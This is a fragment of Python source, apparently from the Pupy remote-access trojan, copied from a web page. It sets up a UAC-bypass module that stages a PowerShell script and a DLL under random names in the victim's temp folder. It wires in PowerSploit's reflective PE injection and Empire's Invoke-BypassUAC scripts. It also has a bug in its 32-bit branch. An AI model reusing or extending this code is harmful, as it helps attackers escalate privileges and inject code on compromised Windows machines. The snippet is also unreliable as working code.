def __init__(self, module, rootPupyPath):
'''
'''
self.module = module
self.rootPupyPath = rootPupyPath
#Constants
self.x86PowershellPath = "syswow64\WindowsPowerShell\\v1.0\\powershell.exe"
self.x64PowershellPath = "system32\\WindowsPowerShell\\v1.0\\powershell.exe"
#Remote paths
self.remoteTempFolder=self.module.client.conn.modules['os.path'].expandvars("%TEMP%")
self.systemRoot = self.module.client.conn.modules['os.path'].expandvars("%SYSTEMROOT%")
self.invokeReflectivePEInjectionRemotePath = "{0}.{1}".format(self.module.client.conn.modules['os.path'].join(self.remoteTempFolder, next(_get_candidate_names())), '.txt')
self.mainPowershellScriptRemotePath = "{0}.{1}".format(self.module.client.conn.modules['os.path'].join(self.remoteTempFolder, next(_get_candidate_names())), '.ps1')
self.pupyDLLRemotePath = "{0}.{1}".format(self.module.client.conn.modules['os.path'].join(self.remoteTempFolder, next(_get_candidate_names())), '.txt')
self.invokeBypassUACRemotePath = "{0}.{1}".format(self.module.client.conn.modules['os.path'].join(self.remoteTempFolder, next(_get_candidate_names())), '.ps1')
#Define Local paths
self.pupyDLLLocalPath = os.path.join(gettempdir(),'dllFile.txt')
self.mainPowerShellScriptPrivilegedLocalPath = os.path.join(gettempdir(),'mainPowerShellScriptPrivileged.txt')
self.invokeReflectivePEInjectionLocalPath = os.path.join(self.rootPupyPath,"pupy", "external", "PowerSploit", "CodeExecution", "Invoke-ReflectivePEInjection.ps1")
self.invokeBypassUACLocalPath = os.path.join(rootPupyPath, "pupy", "external", "Empire", "privesc", "Invoke-BypassUAC.ps1")
#Others
self.HKCU = self.module.client.conn.modules['_winreg'].HKEY_CURRENT_USER
if "64" in self.module.client.desc['proc_arch']: self.powershellPath = self.module.client.conn.modules['os.path'].join(self.systemRoot, self.x64PowershellPath)
else: powershellPath = self.module.client.conn.modules['os.path'].join(self.systemRoot, self.x86PowershellPath)
评论列表
文章目录
